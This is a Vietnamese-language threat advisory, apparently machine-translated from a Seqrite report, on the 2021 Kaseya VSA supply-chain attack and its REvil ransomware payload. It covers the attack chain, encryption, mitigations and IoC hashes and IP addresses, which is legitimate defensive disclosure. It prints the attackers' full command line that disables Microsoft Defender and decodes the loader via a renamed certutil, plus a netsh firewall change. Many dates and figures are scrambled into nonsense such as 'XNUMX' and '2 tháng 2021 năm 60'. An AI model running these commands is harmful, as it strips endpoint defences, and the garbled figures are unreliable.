Trong một sự kiện gần đây, Kaseya - nhà cung cấp phần mềm cho các nhà cung cấp dịch vụ (MSP) và đội ngũ CNTT tại Hoa Kỳ đã báo cáo về một cuộc tấn công Chuỗi cung ứng trên toàn thế giới vào ngày 2 tháng 2021 năm 60, lợi dụng Ngày Độc lập Hoa Kỳ làm đòn bẩy vì lực lượng nhân viên giám sát cuộc tấn công sẽ yếu hơn. Nhóm tin tặc đã khai thác lỗ hổng zero-day trong phần mềm Kaseya VSA để triển khai ransomware REvil cho khách hàng. Cuộc tấn công do nhóm REvil thực hiện có thể đã ảnh hưởng đến khoảng XNUMX nhà cung cấp dịch vụ (MSP) và khách hàng doanh nghiệp của họ bằng kỹ thuật chuỗi cung ứng. Những kẻ tấn công đã yêu cầu một khoản tiền chuộc cao cho quá trình giải mã hoặc đe dọa sẽ tiết lộ thông tin nếu họ không trả tiền chuộc.
REvil/Sodinokibi là gì?
REvil/Sodinokibi/Sodin là phiên bản đổi tên của mã độc tống tiền GrandCrab, liên quan đến nhóm GOLD SOUTHFIELD với động cơ tài chính. Nhóm này được biết đến với việc đánh cắp dữ liệu của nạn nhân trước khi mã hóa và đe dọa sẽ công khai nếu tiền chuộc không được trả.
Chúng hoạt động từ tháng 2019 năm 40 và gây ra gần XNUMX% tổng số vụ lây nhiễm ransomware trên toàn cầu. Ban đầu, nhóm này nhắm mục tiêu vào khu vực châu Á và châu Âu, nhưng hiện đã lan rộng ra toàn thế giới.
Khi ransomware mới xuất hiện, nó đã khai thác các lỗ hổng trong máy chủ và các tài sản quan trọng khác của các doanh nghiệp vừa và nhỏ (SMB) cũng như các trình cài đặt phần mềm để khai thác các bộ công cụ. Nhưng giờ đây, chúng đã bắt đầu xu hướng tấn công chuỗi cung ứng. Chúng tôi đã công bố blog liên quan đến GrandCrab, rất giống với REvil tấn công ransomware.
Những kẻ tấn công đã đột nhập bằng cách nào?
Các tin tặc đã phát động cuộc tấn công vào các nhà cung cấp MSP và khai thác lỗ hổng zero-day [CVE-2021-30116] trong các máy chủ VSA tại chỗ. Bằng cách xâm nhập vào Máy chủ VSA, bất kỳ máy khách nào được kết nối sẽ thực hiện bất kỳ tác vụ nào mà máy chủ VSA yêu cầu mà không cần thắc mắc. Kẻ tấn công đứng sau vụ việc này sẽ vô hiệu hóa quyền truy cập quản trị vào VSA sau khi chúng truy cập vào mạng của nạn nhân.
Người ta phát hiện ra rằng những kẻ tấn công đã sử dụng các địa chỉ IP bên dưới để bắt đầu cuộc tấn công bằng cách sử dụng người dùng “agent curl/7.69.1.”
- 18 [.] 223.199.234
- 161 [.] 35.239.148
- 35 [.] 226.94.113
- 162 [.] 253.124.162
Không giống như vụ tấn công chuỗi cung ứng SolarWinds, máy chủ của Kaseya không có dấu hiệu bị xâm phạm. Nhiều khách hàng của Kaseya là nhà cung cấp dịch vụ (MSP). Tin tặc đã khai thác phiên bản phần mềm tại chỗ và có thể dễ dàng truyền mã độc tống tiền xuống hạ nguồn.
Số tiền mà nhóm này yêu cầu dao động từ 50,000 đến 5 triệu đô la, tùy thuộc vào việc hệ thống có được kết nối với một tên miền hay không. Ngoài ra, chúng còn yêu cầu 70 triệu đô la cho bộ giải mã phổ quát, được đăng tải trên trang web đen của chúng.
Chi tiết kỹ thuật về cuộc tấn công zero-day của Kaseya VSA
- Giai đoạn đầu bắt đầu khi quá trình độc hại từ Nhà cung cấp dịch vụ được quản lý (MSP) tiếp cận người dùng.
- Quy trình VSA triển khai mã hóa có tên “Kaseya VSA Agent Hotfix”, chạy trong hệ thống với quyền quản trị để bỏ qua các biện pháp bảo mật khi xử lý bản cập nhật.
- Tập lệnh được thực thi như bên dưới, vô hiệu hóa dịch vụ Microsoft Defender, DisableRealtimeMonitoring, DisableIntrusionPreventionSystem, DisableIOAVProtectio và DisableScriptScanning.
“C:\WINDOWS\system32\cmd.exe” /c ping 127.0.0.1 -n 4979 > nul & C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Set-MpPreference -DisableRealtimeMonitoring $true -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend & copy /YC:\Windows\System32\certutil.exe C:\Windows\cert.exe & echo %RANDOM% >> C:\Windows\cert.exe & C:\Windows\cert.exe -decode c:\kworking\agent.crt c:\kworking\agent.exe & del /q /fc:\kworking\agent.crt C:\Windows\cert.exe và c:\kworking\agent.exe - Khi bản cập nhật này được xử lý, nó sẽ phân phối tải trọng REvil với trình tải thực thi độc hại “agent.exe”
- Agent.exe có chữ ký số hợp lệ được ký bởi “PE03 TRANSPORT LTD” và được ký một ngày trước cuộc tấn công

Gọi Mpsvc.dll được tải bên ngoài bằng MsMpEng.exe - Sử dụng “MsMpEng.exe”, “Mpscv.dll” được tải phụ để chạy ransomware.
- Chuỗi quy trình tổng thể được mô tả như sau

Quy trình tổng thể
Khi thực hiện Ransomware REvil.
- Nó bắt đầu quá trình bằng cách giải mã chính nó trong bộ nhớ và trích xuất tệp cấu hình được lưu trữ ở định dạng JSON với các tham số cấu hình như được hiển thị đây.
- Không giống như các phiên bản khác, tính năng này không xóa "Bản sao Bóng" (Shadow Copies) của Windows, điều mà hầu hết các phần mềm tống tiền thường làm. Việc kích hoạt tính năng này có thể khiến quá trình dừng lại vì nó được hầu hết các công ty phần mềm diệt virus sử dụng như một cơ chế để phát hiện ransomware.
- Mã hóa AES được sử dụng để mã hóa khóa riêng của cặp khóa riêng-công khai, được tạo cục bộ trên máy của người dùng.
- Ngược lại, Salsa20 được sử dụng để mã hóa các tập tin của người dùng.

Lưu cấu hình trong Registry - Nó cũng tạo khóa registry “HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\BlackLivesMatter”, nơi lưu trữ các khóa đã tạo. Khóa này chứa một khóa riêng được mã hóa bằng khóa công khai trong cấu hình. Khóa công khai và khóa riêng được mã hóa ở dạng nhị phân. Chuỗi thông tin được mã hóa sau đó được gửi đến máy chủ C2, tại đó một phần mở rộng tệp ngẫu nhiên sẽ được thêm vào các tệp được mã hóa.
- Bằng cách sử dụng lệnh được cung cấp bên dưới, nó sẽ thêm cài đặt tường lửa của Windows để cho phép hệ thống cục bộ được các máy tính khác phát hiện trên mạng cục bộ.
| netsh advfirewall firewall set rule group=”Network Discovery” new enable=Yes |
- Quá trình mã hóa bắt đầu bằng nhiều luồng và mã hóa các tệp được cung cấp trong phần mở rộng, bao gồm cả ổ đĩa mạng.
- REvil sử dụng thuật toán tạo và trao đổi khóa "Elliptic-curve Diffie-Hellman" để tạo cặp khóa riêng tư-công khai. Một khóa bí mật dùng chung được phát triển để sử dụng làm khóa cho các thuật toán mã hóa đối xứng AES và Salsa20.
- Sau khi thực hiện xong, một tệp ghi chú tiền chuộc sẽ được đưa vào mỗi thư mục với các thủ tục hướng dẫn cách lấy lại các tệp đó.

Tiền chuộc - Việc giải mã chỉ có thể được thực hiện sau khi thanh toán số tiền chuộc vì công cụ giải mã chung vẫn chưa có sẵn.

Trang giải mã trong dark web
Kết luận
Kaseya đã phát hành bản vá vào ngày 11 tháng XNUMX và cũng đã đưa cơ sở hạ tầng SaaS của VSA trở lại hoạt động. Bản vá có thể được tải xuống từ đâyHọ cũng đã phát hành một công cụ để quét, phát hiện rủi ro khai thác tiềm ẩn trong máy chủ VSA và để quét điểm cuối. Tải về Nó ở đây. Ransomware là vấn đề nghiêm trọng nhất gây gián đoạn hoạt động. Động lực chính của việc này là lợi ích tài chính mà kẻ tấn công nhận được. Chúng ta không thể ngăn chặn các cuộc tấn công có chủ đích nhưng có thể ngăn chặn chúng.
Seqrite Khuyến cáo các tổ chức nên cảnh giác với nguy cơ tấn công ransomware ngày càng gia tăng và chuẩn bị sẵn các kế hoạch ứng phó sự cố cũng như một nhóm có thể xử lý các vấn đề khẩn cấp.
Các cách chủ động để ngăn chặn/hạn chế các loại tấn công này là
- Bao gồm chuỗi cung ứng trong kế hoạch ứng phó và khắc phục của bạn.
- Lập bản đồ bối cảnh mối đe dọa.
- Đảm bảo các nhà cung cấp trong chuỗi cung ứng của bạn có chính sách và quy trình bảo mật được cấu trúc, xác thực và chứng nhận.
- Duy trì các bản sao lưu hiện tại của dữ liệu có giá trị để giảm thiểu thiệt hại gây ra.
Làm thế nào Seqrite bảo vệ người dùng của nó?
Quick Heal cung cấp các công cụ chủ động để chặn mã độc tống tiền trong đợt tấn công này. Quick Heal phát hiện các mẫu có tên phát hiện sau:
- Trojanransom.Gen
- Trojanransom.Sodin
- Tiền chuộc.Sự trả thù
- Trojanransom.Encoder
- Trojan.Agent
Các chỉ số về sự thỏa hiệp (IoC)
Loader
- 0299e3c2536543885860c7b61e1efc3f
- 5a97a50e45e64db41049fd88a75f2dd2
- be6c46239e9c753de227bf1f3428e271
- 835f242dde220cc76ee5544119562268
- 18786bfac1be0ddf23ff94c029ca4d63
- 8535397007ecb56d666b666c3592c26d
- 561cffbaba71a6e8cc1cdceda990ead4
DLL
- 78066A1C4E075941272A86D4A8E49471
- 040818b1b3c9b1bf8245f5bcb4eebbbc
- 849fb558745e4089a8232312594b21d2
- 4a91cb0705539e1d09108c60f991ffcf
- 7d1807850275485397ce2bb218eff159
- a560890b8af60b9824c73be74ef24a46
- a47cf00aedf769d60d58bfe00c0b5421
Tệp cấu hình REvil
dự án
Tư vấn về cuộc tấn công Ransomware chuỗi cung ứng Kaseya VSA



